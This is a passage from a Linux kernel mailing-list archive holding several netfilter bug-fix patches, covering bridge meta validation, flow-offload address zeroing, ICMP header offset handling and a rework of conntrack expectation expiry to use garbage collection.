
From: Florian Westphal <fw@strlen.de>

Blamed commit added NFT_META_BRI_IIFHWADDR to the set validate callback,
yet this is a get operation.

Add a get validate callback and move the NFT_META_BRI_IIFHWADDR key
there.

AFAICS this is harmless, NFT_META_BRI_IIFHWADDR can deal with a NULL
input device and the set handler ignores a NFT_META_BRI_IIFHWADDR
operation, but it allows to read 4 bytes off bridge skb->cb[].

Fixes: cbd2257dc96e ("netfilter: nft_meta_bridge: introduce NFT_META_BRI_IIFHWADDR support")
Signed-off-by: Florian Westphal <fw@strlen.de>
Reviewed-by: Fernando Fernandez Mancera <fmancera@suse.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 include/net/netfilter/nft_meta.h       |  2 ++
 net/bridge/netfilter/nft_meta_bridge.c | 19 ++++++++++++++++++-
 net/netfilter/nft_meta.c               |  5 +++--
 3 files changed, 23 insertions(+), 3 deletions(-)

diff --git a/include/net/netfilter/nft_meta.h b/include/net/netfilter/nft_meta.h
index f74e63290603..6cf1d910bbf8 100644
--- a/include/net/netfilter/nft_meta.h
+++ b/include/net/netfilter/nft_meta.h
@@ -40,6 +40,8 @@ void nft_meta_set_eval(const struct nft_expr *expr,
 void nft_meta_set_destroy(const struct nft_ctx *ctx,
 			  const struct nft_expr *expr);
 
+int nft_meta_get_validate(const struct nft_ctx *ctx,
+			  const struct nft_expr *expr);
 int nft_meta_set_validate(const struct nft_ctx *ctx,
 			  const struct nft_expr *expr);
 
diff --git a/net/bridge/netfilter/nft_meta_bridge.c b/net/bridge/netfilter/nft_meta_bridge.c
index 219c40680260..3d95f68e0906 100644
--- a/net/bridge/netfilter/nft_meta_bridge.c
+++ b/net/bridge/netfilter/nft_meta_bridge.c
@@ -107,12 +107,30 @@ static int nft_meta_bridge_get_init(const struct nft_ctx *ctx,
 					NULL, NFT_DATA_VALUE, len);
 }
 
+static int nft_meta_bridge_get_validate(const struct nft_ctx *ctx,
+					const struct nft_expr *expr)
+{
+	struct nft_meta *priv = nft_expr_priv(expr);
+	unsigned int hooks;
+
+	switch (priv->key) {
+	case NFT_META_BRI_IIFHWADDR:
+		hooks = 1 << NF_BR_PRE_ROUTING;
+		break;
+	default:
+		return nft_meta_get_validate(ctx, expr);
+	}
+
+	return nft_chain_validate_hooks(ctx->chain, hooks);
+}
+
 static struct nft_expr_type nft_meta_bridge_type;
 static const struct nft_expr_ops nft_meta_bridge_get_ops = {
 	.type		= &nft_meta_bridge_type,
 	.size		= NFT_EXPR_SIZE(sizeof(struct nft_meta)),
 	.eval		= nft_meta_bridge_get_eval,
 	.init		= nft_meta_bridge_get_init,
+	.validate	= nft_meta_bridge_get_validate,
 	.dump		= nft_meta_get_dump,
 };
 
@@ -168,7 +186,6 @@ static int nft_meta_bridge_set_validate(const struct nft_ctx *ctx,
 
 	switch (priv->key) {
 	case NFT_META_BRI_BROUTE:
-	case NFT_META_BRI_IIFHWADDR:
 		hooks = 1 << NF_BR_PRE_ROUTING;
 		break;
 	default:
diff --git a/net/netfilter/nft_meta.c b/net/netfilter/nft_meta.c
index 9b5821c64442..0a43e0787a68 100644
--- a/net/netfilter/nft_meta.c
+++ b/net/netfilter/nft_meta.c
@@ -635,8 +635,8 @@ static int nft_meta_get_validate_xfrm(const struct nft_ctx *ctx)
 #endif
 }
 
-static int nft_meta_get_validate(const struct nft_ctx *ctx,
-				 const struct nft_expr *expr)
+int nft_meta_get_validate(const struct nft_ctx *ctx,
+			  const struct nft_expr *expr)
 {
 	const struct nft_meta *priv = nft_expr_priv(expr);
 
@@ -652,6 +652,7 @@ static int nft_meta_get_validate(const struct nft_ctx *ctx,
 
 	return 0;
 }
+EXPORT_SYMBOL_GPL(nft_meta_get_validate);
 
 int nft_meta_set_validate(const struct nft_ctx *ctx,
 			  const struct nft_expr *expr)
-- 
2.47.3


^ permalink raw reply related

* [PATCH net 11/14] netfilter: nft_flow_offload: zero device address for non-ether case
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Florian Westphal <fw@strlen.de>

LLM points out that the skip causes unitialised stack array to
propagate down into dev_fill_forward_path().  Its not clear to me that
there is a guarantee that a later ctx.dev->netdev_ops->ndo_fill_forward_path()
would always fix this up.

Cc: Felix Fietkau <nbd@nbd.name>
Fixes: 45ca3e61999e ("netfilter: nft_flow_offload: skip dst neigh lookup for ppp devices")
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 net/netfilter/nf_flow_table_path.c | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/net/netfilter/nf_flow_table_path.c b/net/netfilter/nf_flow_table_path.c
index 1e7e216b9f89..98c03b487f52 100644
--- a/net/netfilter/nf_flow_table_path.c
+++ b/net/netfilter/nf_flow_table_path.c
@@ -53,8 +53,10 @@ static int nft_dev_fill_forward_path(const struct nf_flow_route *route,
 	struct neighbour *n;
 	u8 nud_state;
 
-	if (!nft_is_valid_ether_device(dev))
+	if (!nft_is_valid_ether_device(dev)) {
+		eth_zero_addr(ha);
 		goto out;
+	}
 
 	n = dst_neigh_lookup(dst_cache, daddr);
 	if (!n)
-- 
2.47.3


^ permalink raw reply related

* [PATCH net 12/14] netfilter: nf_reject: skip iphdr options when looking for icmp header
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

From: Florian Westphal <fw@strlen.de>

Not a big deal but this hould have used the real ip header length and not the
base header size.  As-is, if there are options then
nf_skb_is_icmp_unreach() result will be random.

Fixes: db99b2f2b3e2 ("netfilter: nf_reject: don't reply to icmp error messages")
Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 net/ipv4/netfilter/nf_reject_ipv4.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/net/ipv4/netfilter/nf_reject_ipv4.c b/net/ipv4/netfilter/nf_reject_ipv4.c
index fecf6621f679..4626dc46808f 100644
--- a/net/ipv4/netfilter/nf_reject_ipv4.c
+++ b/net/ipv4/netfilter/nf_reject_ipv4.c
@@ -89,7 +89,7 @@ static bool nf_skb_is_icmp_unreach(const struct sk_buff *skb)
 	if (iph->protocol != IPPROTO_ICMP)
 		return false;
 
-	thoff = skb_network_offset(skb) + sizeof(*iph);
+	thoff = skb_network_offset(skb) + ip_hdrlen(skb);
 
 	tp = skb_header_pointer(skb,
 				thoff + offsetof(struct icmphdr, type),
-- 
2.47.3


^ permalink raw reply related

* [PATCH net 13/14] netfilter: nf_conntrack_expect: use conntrack GC to reap expectations
From: Pablo Neira Ayuso @ 2026-06-20 22:27 UTC (permalink / raw)
  To: netfilter-devel; +Cc: davem, netdev, kuba, pabeni, edumazet, fw, horms
In-Reply-To: <20260620222738.112506-1-pablo@netfilter.org>

This patch replaces the timer API by GC worker approach for
expectations, as it already happened in many other subsystems.

Use the existing conntrack GC worker to iterate over the local list of
expectations in the master conntrack to reap expired expectations.
Check IPS_HELPER_BIT to run GC for expectations, set it on for nft_ct
expectation which nevers sets it. Hold the expectation spinlock while
iterating over the master conntrack expectation list to synchronize with
nf_ct_remove_expectations(). This also performs runtime packet path
garbage collection through the expectation insertion and lookup
functions while walking over one of the chains of the global expectation
hashtables. Unconfirmed conntrack entries are skipped since ct->ext can
be reallocated and dying are skipped since those will be gone soon.
Set on IPS_HELPER_BIT if the helper ct extension is added, then the new
GC worker does not need to bump the ct refcount to check if the ct->ext
helper is available.

This removes the extra bump on the refcount for expectation timers, this
allows to remove several nf_ct_expect_put() calls after the unlink,
after this update only refcount remains at 1 while on the expectation
hashes.

This patch implicitly addresses a race with the existing timer API
allowing an expectation to access a stale exp->master pointer which has
been already released when expectation removal loses races with an
expiring timer, ie. timer_del() reporting false.

Add a new NF_CT_EXPECT_DEAD flag to reap this expectation via GC. This
is needed by nf_conntrack_unexpect_related() which is called in error
paths to invalidate newly created expectations that has been added into
the hashes. These expectactions cannot be inmediately released as GC or
nf_ct_remove_expectations() could race to make it. On expectation
insert, the runtime GC reaps stale expectations before checking the
expectation limit set by policy.

Set current timestamp in nf_ct_expect_alloc(), then add the expectation
policy timeout (or custom timeout specified added on top of this) to
specify the expectation lifetime.

Fixes: bffcaad9afdf ("netfilter: ctnetlink: ensure safe access to master conntrack")
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
---
 include/net/netfilter/nf_conntrack_expect.h   |  16 +-
 .../linux/netfilter/nf_conntrack_common.h     |   1 +
 net/netfilter/nf_conntrack_core.c             |  33 +++-
 net/netfilter/nf_conntrack_expect.c           | 145 +++++++++---------
 net/netfilter/nf_conntrack_h323_main.c        |   4 +-
 net/netfilter/nf_conntrack_helper.c           |  10 +-
 net/netfilter/nf_conntrack_netlink.c          |  22 ++-
 net/netfilter/nf_conntrack_sip.c              |  13 +-
 net/netfilter/nft_ct.c                        |   3 +-
 9 files changed, 139 insertions(+), 108 deletions(-)

diff --git a/include/net/netfilter/nf_conntrack_expect.h b/include/net/netfilter/nf_conntrack_expect.h
index 80f50fd0f7ad..be4a120d549e 100644
--- a/include/net/netfilter/nf_conntrack_expect.h
+++ b/include/net/netfilter/nf_conntrack_expect.h
@@ -54,8 +54,8 @@ struct nf_conntrack_expect {
 	/* The conntrack of the master connection */
 	struct nf_conn *master;
 
-	/* Timer function; deletes the expectation. */
-	struct timer_list timeout;
+	/* jiffies32 when this expectation expires */
+	u32 timeout;
 
 #if IS_ENABLED(CONFIG_NF_NAT)
 	union nf_inet_addr saved_addr;
@@ -69,6 +69,14 @@ struct nf_conntrack_expect {
 	struct rcu_head rcu;
 };
 
+static inline bool nf_ct_exp_is_expired(const struct nf_conntrack_expect *exp)
+{
+	if (READ_ONCE(exp->flags) & NF_CT_EXPECT_DEAD)
+		return true;
+
+	return (__s32)(READ_ONCE(exp->timeout) - nfct_time_stamp) <= 0;
+}
+
 static inline struct net *nf_ct_exp_net(struct nf_conntrack_expect *exp)
 {
 	return read_pnet(&exp->net);
@@ -130,7 +138,6 @@ static inline void nf_ct_unlink_expect(struct nf_conntrack_expect *exp)
 
 void nf_ct_remove_expectations(struct nf_conn *ct);
 void nf_ct_unexpect_related(struct nf_conntrack_expect *exp);
-bool nf_ct_remove_expect(struct nf_conntrack_expect *exp);
 
 void nf_ct_expect_iterate_destroy(bool (*iter)(struct nf_conntrack_expect *e, void *data), void *data);
 void nf_ct_expect_iterate_net(struct net *net,
@@ -153,5 +160,8 @@ static inline int nf_ct_expect_related(struct nf_conntrack_expect *expect,
 	return nf_ct_expect_related_report(expect, 0, 0, flags);
 }
 
+struct nf_conn_help;
+void nf_ct_expectation_gc(struct nf_conn_help *master_help);
+
 #endif /*_NF_CONNTRACK_EXPECT_H*/
 
diff --git a/include/uapi/linux/netfilter/nf_conntrack_common.h b/include/uapi/linux/netfilter/nf_conntrack_common.h
index 56b6b60a814f..ee51045ae1d6 100644
--- a/include/uapi/linux/netfilter/nf_conntrack_common.h
+++ b/include/uapi/linux/netfilter/nf_conntrack_common.h
@@ -160,6 +160,7 @@ enum ip_conntrack_expect_events {
 #define NF_CT_EXPECT_USERSPACE		0x4
 
 #ifdef __KERNEL__
+#define NF_CT_EXPECT_DEAD		0x8
 #define NF_CT_EXPECT_MASK	(NF_CT_EXPECT_PERMANENT | NF_CT_EXPECT_INACTIVE | \
 				 NF_CT_EXPECT_USERSPACE)
 #endif
diff --git a/net/netfilter/nf_conntrack_core.c b/net/netfilter/nf_conntrack_core.c
index 4fb3a2d18631..784bd1d7a9bf 100644
--- a/net/netfilter/nf_conntrack_core.c
+++ b/net/netfilter/nf_conntrack_core.c
@@ -1471,6 +1471,31 @@ static bool gc_worker_can_early_drop(const struct nf_conn *ct)
 	return false;
 }
 
+static void nf_ct_help_gc(struct nf_conn *ct)
+{
+	struct nf_conn_help *help;
+
+	if (!refcount_inc_not_zero(&ct->ct_general.use))
+		return;
+
+	/* load ->status after refcount increase */
+	smp_acquire__after_ctrl_dep();
+
+	if (!nf_ct_is_confirmed(ct) || nf_ct_is_dying(ct)) {
+		nf_ct_put(ct);
+		return;
+	}
+
+	/* re-check helper due to SLAB_TYPESAFE_BY_RCU */
+	if (test_bit(IPS_HELPER_BIT, &ct->status)) {
+		help = nfct_help(ct);
+		if (help)
+			nf_ct_expectation_gc(help);
+	}
+
+	nf_ct_put(ct);
+}
+
 static void gc_worker(struct work_struct *work)
 {
 	unsigned int i, hashsz, nf_conntrack_max95 = 0;
@@ -1543,7 +1568,13 @@ static void gc_worker(struct work_struct *work)
 			expires = (expires - (long)next_run) / ++count;
 			next_run += expires;
 
-			if (nf_conntrack_max95 == 0 || gc_worker_skip_ct(tmp))
+			if (gc_worker_skip_ct(tmp))
+				continue;
+
+			if (test_bit(IPS_HELPER_BIT, &tmp->status))
+				nf_ct_help_gc(tmp);
+
+			if (nf_conntrack_max95 == 0)
 				continue;
 
 			net = nf_ct_net(tmp);
diff --git a/net/netfilter/nf_conntrack_expect.c b/net/netfilter/nf_conntrack_expect.c
index 5c9b17835c28..49e18eda037e 100644
--- a/net/netfilter/nf_conntrack_expect.c
+++ b/net/netfilter/nf_conntrack_expect.c
@@ -43,6 +43,24 @@ unsigned int nf_ct_expect_max __read_mostly;
 static struct kmem_cache *nf_ct_expect_cachep __read_mostly;
 static siphash_aligned_key_t nf_ct_expect_hashrnd;
 
+void nf_ct_expectation_gc(struct nf_conn_help *master_help)
+{
+	struct nf_conntrack_expect *exp;
+	struct hlist_node *next;
+
+	if (hlist_empty(&master_help->expectations))
+		return;
+
+	spin_lock_bh(&nf_conntrack_expect_lock);
+	hlist_for_each_entry_safe(exp, next, &master_help->expectations, lnode) {
+		if (!nf_ct_exp_is_expired(exp))
+			continue;
+
+		nf_ct_unlink_expect(exp);
+	}
+	spin_unlock_bh(&nf_conntrack_expect_lock);
+}
+
 /* nf_conntrack_expect helper functions */
 void nf_ct_unlink_expect_report(struct nf_conntrack_expect *exp,
 				u32 portid, int report)
@@ -52,7 +70,6 @@ void nf_ct_unlink_expect_report(struct nf_conntrack_expect *exp,
 	struct nf_conntrack_net *cnet;
 
 	lockdep_nfct_expect_lock_held();
-	WARN_ON_ONCE(timer_pending(&exp->timeout));
 
 	hlist_del_rcu(&exp->hnode);
 
@@ -70,16 +87,6 @@ void nf_ct_unlink_expect_report(struct nf_conntrack_expect *exp,
 }
 EXPORT_SYMBOL_GPL(nf_ct_unlink_expect_report);
 
-static void nf_ct_expectation_timed_out(struct timer_list *t)
-{
-	struct nf_conntrack_expect *exp = timer_container_of(exp, t, timeout);
-
-	spin_lock_bh(&nf_conntrack_expect_lock);
-	nf_ct_unlink_expect(exp);
-	spin_unlock_bh(&nf_conntrack_expect_lock);
-	nf_ct_expect_put(exp);
-}
-
 static unsigned int nf_ct_expect_dst_hash(const struct net *n, const struct nf_conntrack_tuple *tuple)
 {
 	struct {
@@ -117,19 +124,6 @@ nf_ct_exp_equal(const struct nf_conntrack_tuple *tuple,
 	       nf_ct_exp_zone_equal_any(i, zone);
 }
 
-bool nf_ct_remove_expect(struct nf_conntrack_expect *exp)
-{
-	lockdep_nfct_expect_lock_held();
-
-	if (timer_delete(&exp->timeout)) {
-		nf_ct_unlink_expect(exp);
-		nf_ct_expect_put(exp);
-		return true;
-	}
-	return false;
-}
-EXPORT_SYMBOL_GPL(nf_ct_remove_expect);
-
 struct nf_conntrack_expect *
 __nf_ct_expect_find(struct net *net,
 		    const struct nf_conntrack_zone *zone,
@@ -144,6 +138,8 @@ __nf_ct_expect_find(struct net *net,
 
 	h = nf_ct_expect_dst_hash(net, tuple);
 	hlist_for_each_entry_rcu(i, &nf_ct_expect_hash[h], hnode) {
+		if (nf_ct_exp_is_expired(i))
+			continue;
 		if (nf_ct_exp_equal(tuple, i, zone, net))
 			return i;
 	}
@@ -178,6 +174,7 @@ nf_ct_find_expectation(struct net *net,
 {
 	struct nf_conntrack_net *cnet = nf_ct_pernet(net);
 	struct nf_conntrack_expect *i, *exp = NULL;
+	struct hlist_node *next;
 	unsigned int h;
 
 	lockdep_nfct_expect_lock_held();
@@ -186,7 +183,11 @@ nf_ct_find_expectation(struct net *net,
 		return NULL;
 
 	h = nf_ct_expect_dst_hash(net, tuple);
-	hlist_for_each_entry(i, &nf_ct_expect_hash[h], hnode) {
+	hlist_for_each_entry_safe(i, next, &nf_ct_expect_hash[h], hnode) {
+		if (nf_ct_exp_is_expired(i)) {
+			nf_ct_unlink_expect(i);
+			continue;
+		}
 		if (!(i->flags & NF_CT_EXPECT_INACTIVE) &&
 		    nf_ct_exp_equal(tuple, i, zone, net)) {
 			exp = i;
@@ -196,13 +197,16 @@ nf_ct_find_expectation(struct net *net,
 	if (!exp)
 		return NULL;
 
+	if (!refcount_inc_not_zero(&exp->use))
+		return NULL;
+
 	/* If master is not in hash table yet (ie. packet hasn't left
 	   this machine yet), how can other end know about expected?
 	   Hence these are not the droids you are looking for (if
 	   master ct never got confirmed, we'd hold a reference to it
 	   and weird things would happen to future packets). */
 	if (!nf_ct_is_confirmed(exp->master))
-		return NULL;
+		goto err_release_exp;
 
 	/* Avoid race with other CPUs, that for exp->master ct, is
 	 * about to invoke ->destroy(), or nf_ct_delete() via timeout
@@ -214,18 +218,17 @@ nf_ct_find_expectation(struct net *net,
 	 */
 	if (unlikely(nf_ct_is_dying(exp->master) ||
 		     !refcount_inc_not_zero(&exp->master->ct_general.use)))
-		return NULL;
+		goto err_release_exp;
 
-	if (exp->flags & NF_CT_EXPECT_PERMANENT || !unlink) {
-		refcount_inc(&exp->use);
-		return exp;
-	} else if (timer_delete(&exp->timeout)) {
-		nf_ct_unlink_expect(exp);
+	if (exp->flags & NF_CT_EXPECT_PERMANENT || !unlink)
 		return exp;
-	}
-	/* Undo exp->master refcnt increase, if timer_delete() failed */
-	nf_ct_put(exp->master);
 
+	nf_ct_unlink_expect(exp);
+
+	return exp;
+
+err_release_exp:
+	nf_ct_expect_put(exp);
 	return NULL;
 }
 
@@ -241,9 +244,8 @@ void nf_ct_remove_expectations(struct nf_conn *ct)
 		return;
 
 	spin_lock_bh(&nf_conntrack_expect_lock);
-	hlist_for_each_entry_safe(exp, next, &help->expectations, lnode) {
-		nf_ct_remove_expect(exp);
-	}
+	hlist_for_each_entry_safe(exp, next, &help->expectations, lnode)
+		nf_ct_unlink_expect(exp);
 	spin_unlock_bh(&nf_conntrack_expect_lock);
 }
 EXPORT_SYMBOL_GPL(nf_ct_remove_expectations);
@@ -292,7 +294,7 @@ static bool master_matches(const struct nf_conntrack_expect *a,
 void nf_ct_unexpect_related(struct nf_conntrack_expect *exp)
 {
 	spin_lock_bh(&nf_conntrack_expect_lock);
-	nf_ct_remove_expect(exp);
+	WRITE_ONCE(exp->flags, exp->flags | NF_CT_EXPECT_DEAD);
 	spin_unlock_bh(&nf_conntrack_expect_lock);
 }
 EXPORT_SYMBOL_GPL(nf_ct_unexpect_related);
@@ -308,6 +310,7 @@ struct nf_conntrack_expect *nf_ct_expect_alloc(struct nf_conn *me)
 	if (!new)
 		return NULL;
 
+	new->timeout = nfct_time_stamp;
 	new->master = me;
 	refcount_set(&new->use, 1);
 	return new;
@@ -413,17 +416,12 @@ static void nf_ct_expect_insert(struct nf_conntrack_expect *exp,
 	struct net *net = nf_ct_exp_net(exp);
 	unsigned int h = nf_ct_expect_dst_hash(net, &exp->tuple);
 
-	/* two references : one for hash insert, one for the timer */
-	refcount_add(2, &exp->use);
+	refcount_inc(&exp->use);
 
-	timer_setup(&exp->timeout, nf_ct_expectation_timed_out, 0);
 	helper = rcu_dereference_protected(master_help->helper,
 					   lockdep_is_held(&nf_conntrack_expect_lock));
-	if (helper) {
-		exp->timeout.expires = jiffies +
-			helper->expect_policy[exp->class].timeout * HZ;
-	}
-	add_timer(&exp->timeout);
+	if (helper)
+		exp->timeout += helper->expect_policy[exp->class].timeout * HZ;
 
 	hlist_add_head_rcu(&exp->lnode, &master_help->expectations);
 	master_help->expecting[exp->class]++;
@@ -435,19 +433,26 @@ static void nf_ct_expect_insert(struct nf_conntrack_expect *exp,
 	NF_CT_STAT_INC(net, expect_create);
 }
 
-/* Race with expectations being used means we could have none to find; OK. */
 static void evict_oldest_expect(struct nf_conn_help *master_help,
-				struct nf_conntrack_expect *new)
+				struct nf_conntrack_expect *new,
+				const struct nf_conntrack_expect_policy *p)
 {
 	struct nf_conntrack_expect *exp, *last = NULL;
+	struct hlist_node *next;
 
-	hlist_for_each_entry(exp, &master_help->expectations, lnode) {
+	hlist_for_each_entry_safe(exp, next, &master_help->expectations, lnode) {
+		if (nf_ct_exp_is_expired(exp)) {
+			nf_ct_unlink_expect(exp);
+			continue;
+		}
 		if (exp->class == new->class)
 			last = exp;
 	}
 
-	if (last)
-		nf_ct_remove_expect(last);
+	/* Still worth to evict oldest expectation after garbage collection? */
+	if (last &&
+	    master_help->expecting[last->class] >= p->max_expected)
+		nf_ct_unlink_expect(last);
 }
 
 static inline int __nf_ct_expect_check(struct nf_conntrack_expect *expect,
@@ -467,14 +472,18 @@ static inline int __nf_ct_expect_check(struct nf_conntrack_expect *expect,
 
 	h = nf_ct_expect_dst_hash(net, &expect->tuple);
 	hlist_for_each_entry_safe(i, next, &nf_ct_expect_hash[h], hnode) {
+		if (nf_ct_exp_is_expired(i)) {
+			nf_ct_unlink_expect(i);
+			continue;
+		}
 		if (master_matches(i, expect, flags) &&
 		    expect_matches(i, expect)) {
 			if (i->class != expect->class ||
 			    i->master != expect->master)
 				return -EALREADY;
 
-			if (nf_ct_remove_expect(i))
-				break;
+			nf_ct_unlink_expect(i);
+			break;
 		} else if (expect_clash(i, expect)) {
 			ret = -EBUSY;
 			goto out;
@@ -486,14 +495,8 @@ static inline int __nf_ct_expect_check(struct nf_conntrack_expect *expect,
 	if (helper) {
 		p = &helper->expect_policy[expect->class];
 		if (p->max_expected &&
-		    master_help->expecting[expect->class] >= p->max_expected) {
-			evict_oldest_expect(master_help, expect);
-			if (master_help->expecting[expect->class]
-						>= p->max_expected) {
-				ret = -EMFILE;
-				goto out;
-			}
-		}
+		    master_help->expecting[expect->class] >= p->max_expected)
+			evict_oldest_expect(master_help, expect, p);
 	}
 
 	cnet = nf_ct_pernet(net);
@@ -547,10 +550,8 @@ void nf_ct_expect_iterate_destroy(bool (*iter)(struct nf_conntrack_expect *e, vo
 		hlist_for_each_entry_safe(exp, next,
 					  &nf_ct_expect_hash[i],
 					  hnode) {
-			if (iter(exp, data) && timer_delete(&exp->timeout)) {
+			if (iter(exp, data))
 				nf_ct_unlink_expect(exp);
-				nf_ct_expect_put(exp);
-			}
 		}
 	}
 
@@ -577,10 +578,8 @@ void nf_ct_expect_iterate_net(struct net *net,
 			if (!net_eq(nf_ct_exp_net(exp), net))
 				continue;
 
-			if (iter(exp, data) && timer_delete(&exp->timeout)) {
+			if (iter(exp, data))
 				nf_ct_unlink_expect_report(exp, portid, report);
-				nf_ct_expect_put(exp);
-			}
 		}
 	}
 
@@ -657,17 +656,17 @@ static int exp_seq_show(struct seq_file *s, void *v)
 	struct net *net = seq_file_net(s);
 	struct hlist_node *n = v;
 	char *delim = "";
+	__s32 timeout;
 
 	expect = hlist_entry(n, struct nf_conntrack_expect, hnode);
 
 	if (!net_eq(nf_ct_exp_net(expect), net))
 		return 0;
+	if (nf_ct_exp_is_expired(expect))
+		return 0;
 
-	if (expect->timeout.function)
-		seq_printf(s, "%ld ", timer_pending(&expect->timeout)
-			   ? (long)(expect->timeout.expires - jiffies)/HZ : 0);
-	else
-		seq_puts(s, "- ");
+	timeout = (__s32)(READ_ONCE(expect->timeout) - nfct_time_stamp) / HZ;
+	seq_printf(s, "%d ", timeout > 0 ? timeout : 0);
 	seq_printf(s, "l3proto = %u proto=%u ",
 		   expect->tuple.src.l3num,
 		   expect->tuple.dst.protonum);
diff --git a/net/netfilter/nf_conntrack_h323_main.c b/net/netfilter/nf_conntrack_h323_main.c
index 7f189dceb3c4..24931e379985 100644
--- a/net/netfilter/nf_conntrack_h323_main.c
+++ b/net/netfilter/nf_conntrack_h323_main.c
@@ -1388,8 +1388,8 @@ static int process_rcf(struct sk_buff *skb, struct nf_conn *ct,
 				 "timeout to %u seconds for",
 				 info->timeout);
 			nf_ct_dump_tuple(&exp->tuple);
-			mod_timer_pending(&exp->timeout,
-					  jiffies + info->timeout * HZ);
+			WRITE_ONCE(exp->timeout,
+				   nfct_time_stamp + (info->timeout * HZ));
 		}
 		spin_unlock_bh(&nf_conntrack_expect_lock);
 	}
diff --git a/net/netfilter/nf_conntrack_helper.c b/net/netfilter/nf_conntrack_helper.c
index 2f35bdd0d7d7..8b94001c2430 100644
--- a/net/netfilter/nf_conntrack_helper.c
+++ b/net/netfilter/nf_conntrack_helper.c
@@ -181,10 +181,10 @@ nf_ct_helper_ext_add(struct nf_conn *ct, gfp_t gfp)
 	struct nf_conn_help *help;
 
 	help = nf_ct_ext_add(ct, NF_CT_EXT_HELPER, gfp);
-	if (help)
+	if (help) {
+		__set_bit(IPS_HELPER_BIT, &ct->status);
 		INIT_HLIST_HEAD(&help->expectations);
-	else
-		pr_debug("failed to add helper extension area");
+	}
 	return help;
 }
 EXPORT_SYMBOL_GPL(nf_ct_helper_ext_add);
@@ -203,10 +203,8 @@ int __nf_ct_try_assign_helper(struct nf_conn *ct, struct nf_conn *tmpl,
 		return 0;
 
 	help = nfct_help(tmpl);
-	if (help != NULL) {
+	if (help)
 		helper = rcu_dereference(help->helper);
-		set_bit(IPS_HELPER_BIT, &ct->status);
-	}
 
 	help = nfct_help(ct);
 
diff --git a/net/netfilter/nf_conntrack_netlink.c b/net/netfilter/nf_conntrack_netlink.c
index b429e648f06c..4e78d2482989 100644
--- a/net/netfilter/nf_conntrack_netlink.c
+++ b/net/netfilter/nf_conntrack_netlink.c
@@ -3014,8 +3014,8 @@ static int
 ctnetlink_exp_dump_expect(struct sk_buff *skb,
 			  const struct nf_conntrack_expect *exp)
 {
+	__s32 timeout = (__s32)(READ_ONCE(exp->timeout) - nfct_time_stamp) / HZ;
 	struct nf_conn *master = exp->master;
-	long timeout = ((long)exp->timeout.expires - (long)jiffies) / HZ;
 	struct nf_conntrack_helper *helper;
 #if IS_ENABLED(CONFIG_NF_NAT)
 	struct nlattr *nest_parms;
@@ -3178,6 +3178,9 @@ ctnetlink_exp_dump_table(struct sk_buff *skb, struct netlink_callback *cb)
 restart:
 		hlist_for_each_entry_rcu(exp, &nf_ct_expect_hash[cb->args[0]],
 					 hnode) {
+			if (nf_ct_exp_is_expired(exp))
+				continue;
+
 			if (l3proto && exp->tuple.src.l3num != l3proto)
 				continue;
 
@@ -3456,11 +3459,8 @@ static int ctnetlink_del_expect(struct sk_buff *skb,
 		}
 
 		/* after list removal, usage count == 1 */
-		if (timer_delete(&exp->timeout)) {
-			nf_ct_unlink_expect_report(exp, NETLINK_CB(skb).portid,
-						   nlmsg_report(info->nlh));
-			nf_ct_expect_put(exp);
-		}
+		nf_ct_unlink_expect_report(exp, NETLINK_CB(skb).portid,
+					   nlmsg_report(info->nlh));
 		spin_unlock_bh(&nf_conntrack_expect_lock);
 		/* have to put what we 'get' above.
 		 * after this line usage count == 0 */
@@ -3484,14 +3484,10 @@ static int
 ctnetlink_change_expect(struct nf_conntrack_expect *x,
 			const struct nlattr * const cda[])
 {
-	if (cda[CTA_EXPECT_TIMEOUT]) {
-		if (!timer_delete(&x->timeout))
-			return -ETIME;
+	if (cda[CTA_EXPECT_TIMEOUT])
+		WRITE_ONCE(x->timeout, nfct_time_stamp +
+			   ntohl(nla_get_be32(cda[CTA_EXPECT_TIMEOUT])) * HZ);
 
-		x->timeout.expires = jiffies +
-			ntohl(nla_get_be32(cda[CTA_EXPECT_TIMEOUT])) * HZ;
-		add_timer(&x->timeout);
-	}
 	return 0;
 }
 
diff --git a/net/netfilter/nf_conntrack_sip.c b/net/netfilter/nf_conntrack_sip.c
index c606d1f60b58..5ec3a4a4bbd7 100644
--- a/net/netfilter/nf_conntrack_sip.c
+++ b/net/netfilter/nf_conntrack_sip.c
@@ -897,11 +897,10 @@ static int refresh_signalling_expectation(struct nf_conn *ct,
 		    exp->tuple.dst.protonum != proto ||
 		    exp->tuple.dst.u.udp.port != port)
 			continue;
-		if (mod_timer_pending(&exp->timeout, jiffies + expires * HZ)) {
-			exp->flags &= ~NF_CT_EXPECT_INACTIVE;
-			found = 1;
-			break;
-		}
+		WRITE_ONCE(exp->timeout, nfct_time_stamp + (expires * HZ));
+		WRITE_ONCE(exp->flags, exp->flags & ~NF_CT_EXPECT_INACTIVE);
+		found = 1;
+		break;
 	}
 	spin_unlock_bh(&nf_conntrack_expect_lock);
 	return found;
@@ -920,8 +919,7 @@ static void flush_expectations(struct nf_conn *ct, bool media)
 	hlist_for_each_entry_safe(exp, next, &help->expectations, lnode) {
 		if ((exp->class != SIP_EXPECT_SIGNALLING) ^ media)
 			continue;
-		if (!nf_ct_remove_expect(exp))
-			continue;
+		nf_ct_unlink_expect(exp);
 		if (!media)
 			break;
 	}
@@ -1413,7 +1411,6 @@ static int process_register_request(struct sk_buff *skb, unsigned int protoff,
 
 	nf_ct_expect_init(exp, SIP_EXPECT_SIGNALLING, nf_ct_l3num(ct),
 			  saddr, &daddr, proto, NULL, &port);
-	exp->timeout.expires = sip_timeout * HZ;
 	rcu_assign_pointer(exp->assign_helper, helper);
 	exp->flags = NF_CT_EXPECT_PERMANENT | NF_CT_EXPECT_INACTIVE;
 
